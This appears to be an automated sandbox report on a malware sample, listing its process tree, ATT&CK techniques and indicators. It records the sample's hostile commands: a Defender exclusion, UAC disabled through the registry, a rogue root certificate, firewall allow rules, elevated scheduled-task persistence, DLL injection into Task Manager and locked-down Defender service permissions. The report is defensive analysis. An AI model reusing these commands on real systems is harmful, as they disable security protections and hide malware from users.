Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	jok.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	jok.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5460	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2824	1ae67ddf4ff145a2d38af88aef5c014e8f31bed46c9900d2a620c746de44fa2a.exe
2824	1ae67ddf4ff145a2d38af88aef5c014e8f31bed46c9900d2a620c746de44fa2a.exe
2232	explorha.exe
2232	explorha.exe
5040	RegAsm.exe
5040	RegAsm.exe
1912	powershell.exe
1912	powershell.exe
1912	powershell.exe
1912	powershell.exe
4164	explorha.exe
4164	explorha.exe
3428	rundll32.exe
3428	rundll32.exe
3428	rundll32.exe
3428	rundll32.exe
3428	rundll32.exe
3428	rundll32.exe
3428	rundll32.exe
3428	rundll32.exe
3428	rundll32.exe
3428	rundll32.exe
3224	powershell.exe
3224	powershell.exe
3224	powershell.exe
3224	powershell.exe
1600	jok.exe
1600	jok.exe
4720	trf.exe
4720	trf.exe
1600	jok.exe
1600	jok.exe
5040	RegAsm.exe
5040	RegAsm.exe
5440	Lucas.pif
5440	Lucas.pif
5440	Lucas.pif
5440	Lucas.pif
5440	Lucas.pif
5440	Lucas.pif
4548	GameService.exe
4548	GameService.exe
5180	GameService.exe
5180	GameService.exe
5396	GameService.exe
5396	GameService.exe
5032	keks.exe
5032	keks.exe
5624	newpub.exe
5624	newpub.exe
5032	keks.exe
5032	keks.exe
4548	GameService.exe
4548	GameService.exe
5180	GameService.exe
5180	GameService.exe
5396	GameService.exe
5396	GameService.exe
5624	newpub.exe
5624	newpub.exe
4548	GameService.exe
4548	GameService.exe
5180	GameService.exe
5180	GameService.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1912	powershell.exe
Token: SeDebugPrivilege	4552	installutil.exe
Token: SeIncreaseQuotaPrivilege	1912	powershell.exe
Token: SeSecurityPrivilege	1912	powershell.exe
Token: SeTakeOwnershipPrivilege	1912	powershell.exe
Token: SeLoadDriverPrivilege	1912	powershell.exe
Token: SeSystemProfilePrivilege	1912	powershell.exe
Token: SeSystemtimePrivilege	1912	powershell.exe
Token: SeProfSingleProcessPrivilege	1912	powershell.exe
Token: SeIncBasePriorityPrivilege	1912	powershell.exe
Token: SeCreatePagefilePrivilege	1912	powershell.exe
Token: SeBackupPrivilege	1912	powershell.exe
Token: SeRestorePrivilege	1912	powershell.exe
Token: SeShutdownPrivilege	1912	powershell.exe
Token: SeDebugPrivilege	1912	powershell.exe
Token: SeSystemEnvironmentPrivilege	1912	powershell.exe
Token: SeRemoteShutdownPrivilege	1912	powershell.exe
Token: SeUndockPrivilege	1912	powershell.exe
Token: SeManageVolumePrivilege	1912	powershell.exe
Token: 33	1912	powershell.exe
Token: 34	1912	powershell.exe
Token: 35	1912	powershell.exe
Token: 36	1912	powershell.exe
Token: SeDebugPrivilege	3224	powershell.exe
Token: SeDebugPrivilege	4720	trf.exe
Token: SeBackupPrivilege	4720	trf.exe
Token: SeSecurityPrivilege	4720	trf.exe
Token: SeSecurityPrivilege	4720	trf.exe
Token: SeSecurityPrivilege	4720	trf.exe
Token: SeSecurityPrivilege	4720	trf.exe
Token: SeDebugPrivilege	1600	jok.exe
Token: SeDebugPrivilege	5188	tasklist.exe
Token: SeDebugPrivilege	5232	tasklist.exe
Token: SeDebugPrivilege	5032	keks.exe
Token: SeDebugPrivilege	5624	newpub.exe
Token: SeDebugPrivilege	4168	RegAsm.exe
Token: SeDebugPrivilege	4432	powershell.exe
Token: SeDebugPrivilege	5920	powershell.exe
Token: SeDebugPrivilege	2660	powershell.exe
Token: SeIncreaseQuotaPrivilege	6140	WMIC.exe
Token: SeSecurityPrivilege	6140	WMIC.exe
Token: SeTakeOwnershipPrivilege	6140	WMIC.exe
Token: SeLoadDriverPrivilege	6140	WMIC.exe
Token: SeSystemProfilePrivilege	6140	WMIC.exe
Token: SeSystemtimePrivilege	6140	WMIC.exe
Token: SeProfSingleProcessPrivilege	6140	WMIC.exe
Token: SeIncBasePriorityPrivilege	6140	WMIC.exe
Token: SeCreatePagefilePrivilege	6140	WMIC.exe
Token: SeBackupPrivilege	6140	WMIC.exe
Token: SeRestorePrivilege	6140	WMIC.exe
Token: SeShutdownPrivilege	6140	WMIC.exe
Token: SeDebugPrivilege	6140	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6140	WMIC.exe
Token: SeRemoteShutdownPrivilege	6140	WMIC.exe
Token: SeUndockPrivilege	6140	WMIC.exe
Token: SeManageVolumePrivilege	6140	WMIC.exe
Token: 33	6140	WMIC.exe
Token: 34	6140	WMIC.exe
Token: 35	6140	WMIC.exe
Token: 36	6140	WMIC.exe
Token: SeIncreaseQuotaPrivilege	6140	WMIC.exe
Token: SeSecurityPrivilege	6140	WMIC.exe
Token: SeTakeOwnershipPrivilege	6140	WMIC.exe
Token: SeLoadDriverPrivilege	6140	WMIC.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
5440	Lucas.pif
5440	Lucas.pif
5440	Lucas.pif

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
5440	Lucas.pif
5440	Lucas.pif
5440	Lucas.pif

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4508	ogkdraw.exe
2696	moqpq.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2824 wrote to memory of 2232	2824	1ae67ddf4ff145a2d38af88aef5c014e8f31bed46c9900d2a620c746de44fa2a.exe	74
PID 2824 wrote to memory of 2232	2824	1ae67ddf4ff145a2d38af88aef5c014e8f31bed46c9900d2a620c746de44fa2a.exe	74
PID 2824 wrote to memory of 2232	2824	1ae67ddf4ff145a2d38af88aef5c014e8f31bed46c9900d2a620c746de44fa2a.exe	74
PID 2232 wrote to memory of 4864	2232	explorha.exe	75
PID 2232 wrote to memory of 4864	2232	explorha.exe	75
PID 2232 wrote to memory of 4864	2232	explorha.exe	75
PID 4864 wrote to memory of 700	4864	swiiiii.exe	77
PID 4864 wrote to memory of 700	4864	swiiiii.exe	77
PID 4864 wrote to memory of 700	4864	swiiiii.exe	77
PID 4864 wrote to memory of 700	4864	swiiiii.exe	77
PID 4864 wrote to memory of 700	4864	swiiiii.exe	77
PID 4864 wrote to memory of 700	4864	swiiiii.exe	77
PID 4864 wrote to memory of 700	4864	swiiiii.exe	77
PID 4864 wrote to memory of 700	4864	swiiiii.exe	77
PID 4864 wrote to memory of 700	4864	swiiiii.exe	77
PID 2232 wrote to memory of 1600	2232	explorha.exe	80
PID 2232 wrote to memory of 1600	2232	explorha.exe	80
PID 2232 wrote to memory of 1600	2232	explorha.exe	80
PID 2232 wrote to memory of 4028	2232	explorha.exe	82
PID 2232 wrote to memory of 4028	2232	explorha.exe	82
PID 2232 wrote to memory of 4028	2232	explorha.exe	82
PID 4028 wrote to memory of 4980	4028	swiy.exe	84
PID 4028 wrote to memory of 4980	4028	swiy.exe	84
PID 4028 wrote to memory of 4980	4028	swiy.exe	84
PID 4028 wrote to memory of 5040	4028	swiy.exe	85
PID 4028 wrote to memory of 5040	4028	swiy.exe	85
PID 4028 wrote to memory of 5040	4028	swiy.exe	85
PID 4028 wrote to memory of 5040	4028	swiy.exe	85
PID 4028 wrote to memory of 5040	4028	swiy.exe	85
PID 4028 wrote to memory of 5040	4028	swiy.exe	85
PID 4028 wrote to memory of 5040	4028	swiy.exe	85
PID 4028 wrote to memory of 5040	4028	swiy.exe	85
PID 4028 wrote to memory of 5040	4028	swiy.exe	85
PID 2232 wrote to memory of 2440	2232	explorha.exe	86
PID 2232 wrote to memory of 2440	2232	explorha.exe	86
PID 2440 wrote to memory of 1912	2440	file300un.exe	87
PID 2440 wrote to memory of 1912	2440	file300un.exe	87
PID 2440 wrote to memory of 4552	2440	file300un.exe	89
PID 2440 wrote to memory of 4552	2440	file300un.exe	89
PID 2440 wrote to memory of 4552	2440	file300un.exe	89
PID 2440 wrote to memory of 4552	2440	file300un.exe	89
PID 2440 wrote to memory of 4552	2440	file300un.exe	89
PID 2440 wrote to memory of 4552	2440	file300un.exe	89
PID 2440 wrote to memory of 4552	2440	file300un.exe	89
PID 2440 wrote to memory of 4552	2440	file300un.exe	89
PID 4552 wrote to memory of 1948	4552	installutil.exe	536
PID 4552 wrote to memory of 1948	4552	installutil.exe	536
PID 4552 wrote to memory of 1948	4552	installutil.exe	536
PID 2232 wrote to memory of 3128	2232	explorha.exe	93
PID 2232 wrote to memory of 3128	2232	explorha.exe	93
PID 2232 wrote to memory of 3128	2232	explorha.exe	93
PID 3128 wrote to memory of 4316	3128	gold.exe	94
PID 3128 wrote to memory of 4316	3128	gold.exe	94
PID 3128 wrote to memory of 4316	3128	gold.exe	94
PID 3128 wrote to memory of 960	3128	gold.exe	95
PID 3128 wrote to memory of 960	3128	gold.exe	95
PID 3128 wrote to memory of 960	3128	gold.exe	95
PID 3128 wrote to memory of 4760	3128	gold.exe	96
PID 3128 wrote to memory of 4760	3128	gold.exe	96
PID 3128 wrote to memory of 4760	3128	gold.exe	96
PID 3128 wrote to memory of 4760	3128	gold.exe	96
PID 3128 wrote to memory of 4760	3128	gold.exe	96
PID 3128 wrote to memory of 4760	3128	gold.exe	96
PID 3128 wrote to memory of 4760	3128	gold.exe	96

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

C:\Users\Admin\AppData\Local\Temp\1ae67ddf4ff145a2d38af88aef5c014e8f31bed46c9900d2a620c746de44fa2a.exe
"C:\Users\Admin\AppData\Local\Temp\1ae67ddf4ff145a2d38af88aef5c014e8f31bed46c9900d2a620c746de44fa2a.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2824
- C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
  "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2232
- - C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe
    "C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:4864
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:700
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 840
      4⤵
      Program crash
      PID:820
- - C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe
    "C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe"
    3⤵
    - Executes dropped EXE
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1600
  - - C:\Users\Admin\AppData\Local\Temp\enpl.exe
      "C:\Users\Admin\AppData\Local\Temp\enpl.exe"
      4⤵
      Executes dropped EXE
      PID:3652
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k move Elimination Elimination.cmd & Elimination.cmd & exit
        5⤵
        
        PID:2640
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5188
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa.exe opssvc.exe"
        6⤵
        
        PID:5200
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5232
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
        6⤵
        
        PID:5240
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 1191
        6⤵
        
        PID:5312
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "despiteoncemartincidence" Ex
        6⤵
        
        PID:5324
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b Ref + Drives + Corners 1191\r
        6⤵
        
        PID:5424
      - C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\1191\Lucas.pif
        
        1191\Lucas.pif 1191\r
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5440
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 2104
        7⤵
        Program crash
        
        PID:4224
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 5 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:5460
  - - C:\Users\Admin\AppData\Local\Temp\pl.exe
      "C:\Users\Admin\AppData\Local\Temp\pl.exe"
      4⤵
      Executes dropped EXE
      PID:5556
    - - C:\Users\Public\Pictures\newpub.exe
        
        "C:\Users\Public\Pictures\newpub.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5624
- - C:\Users\Admin\AppData\Local\Temp\1000073001\swiy.exe
    "C:\Users\Admin\AppData\Local\Temp\1000073001\swiy.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:4028
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:4980
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Loads dropped DLL
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:5040
- - C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe
    "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe"
    3⤵
    - UAC bypass
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    - System policy modification
    PID:2440
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1912
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
      4⤵
      Drops startup file
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4552
    - - C:\Users\Admin\Pictures\IaSwrijVzwI1mgij1L83Pdbd.exe
        
        "C:\Users\Admin\Pictures\IaSwrijVzwI1mgij1L83Pdbd.exe"
        5⤵
        Executes dropped EXE
        
        PID:1948
      - C:\Users\Admin\AppData\Local\Temp\u1i4.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u1i4.0.exe"
        6⤵
        
        PID:5248
      - C:\Users\Admin\AppData\Local\Temp\u1i4.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u1i4.1.exe"
        6⤵
        
        PID:4436
        
        C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        7⤵
        
        PID:4720
    - - C:\Users\Admin\Pictures\zZuojHAQUQ5Cp4NWx0lcwiaI.exe
        
        "C:\Users\Admin\Pictures\zZuojHAQUQ5Cp4NWx0lcwiaI.exe"
        5⤵
        Executes dropped EXE
        
        PID:3632
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4720
      - C:\Users\Admin\Pictures\zZuojHAQUQ5Cp4NWx0lcwiaI.exe
        
        "C:\Users\Admin\Pictures\zZuojHAQUQ5Cp4NWx0lcwiaI.exe"
        6⤵
        
        PID:5272
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4124
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        7⤵
        
        PID:4440
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:5472
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        8⤵
        Modifies Windows Firewall
        
        PID:5368
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4912
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1072
        
        C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        7⤵
        
        PID:3176
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5056
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        8⤵
        Creates scheduled task(s)
        
        PID:5052
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        8⤵
        
        PID:4412
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5520
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2952
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        8⤵
        
        PID:5472
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        8⤵
        Creates scheduled task(s)
        
        PID:5724
        
        C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        8⤵
        
        PID:1632
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        9⤵
        
        PID:5104
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        10⤵
        Launches sc.exe
        
        PID:784
    - - C:\Users\Admin\Pictures\uvoHFhD38aBdr7RSzVq32lma.exe
        
        "C:\Users\Admin\Pictures\uvoHFhD38aBdr7RSzVq32lma.exe"
        5⤵
        Executes dropped EXE
        
        PID:1288
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4152
      - C:\Users\Admin\Pictures\uvoHFhD38aBdr7RSzVq32lma.exe
        
        "C:\Users\Admin\Pictures\uvoHFhD38aBdr7RSzVq32lma.exe"
        6⤵
        
        PID:2040
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5036
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3392
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        7⤵
        
        PID:5544
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        8⤵
        Modifies Windows Firewall
        
        PID:5788
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:872
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5960
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3552
    - - C:\Users\Admin\Pictures\JOUzGzESAhwWCPNEcQc81dnS.exe
        
        "C:\Users\Admin\Pictures\JOUzGzESAhwWCPNEcQc81dnS.exe"
        5⤵
        Executes dropped EXE
        
        PID:1412
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4544
      - C:\Users\Admin\Pictures\JOUzGzESAhwWCPNEcQc81dnS.exe
        
        "C:\Users\Admin\Pictures\JOUzGzESAhwWCPNEcQc81dnS.exe"
        6⤵
        
        PID:5608
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1984
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        7⤵
        
        PID:5316
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        8⤵
        Modifies Windows Firewall
        
        PID:1708
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2124
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:5620
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5648
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:5032
    - - C:\Users\Admin\Pictures\OJ0wvXxf6lnkhWHVWHCkhHCb.exe
        
        "C:\Users\Admin\Pictures\OJ0wvXxf6lnkhWHVWHCkhHCb.exe"
        5⤵
        Executes dropped EXE
        
        PID:2708
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4596
      - C:\Users\Admin\Pictures\OJ0wvXxf6lnkhWHVWHCkhHCb.exe
        
        "C:\Users\Admin\Pictures\OJ0wvXxf6lnkhWHVWHCkhHCb.exe"
        6⤵
        
        PID:4028
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2640
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        7⤵
        
        PID:216
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:2368
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        8⤵
        Modifies Windows Firewall
        
        PID:4240
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5140
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3744
    - - C:\Users\Admin\Pictures\MzVTKXYCpztKoJlD05525DLd.exe
        
        "C:\Users\Admin\Pictures\MzVTKXYCpztKoJlD05525DLd.exe"
        5⤵
        Modifies firewall policy service
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Drops file in System32 directory
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:2668
    - - C:\Users\Admin\Pictures\8K2738cvPlsbBxGQp9FoZE5M.exe
        
        "C:\Users\Admin\Pictures\8K2738cvPlsbBxGQp9FoZE5M.exe"
        5⤵
        Executes dropped EXE
        
        PID:2380
      - C:\Users\Admin\AppData\Local\Temp\7zS49B6.tmp\Install.exe
        
        .\Install.exe /ThYFdiduvbI "385118" /S
        6⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Enumerates system info in registry
        
        PID:5284
        
        C:\Windows\SysWOW64\cmd.exe
        
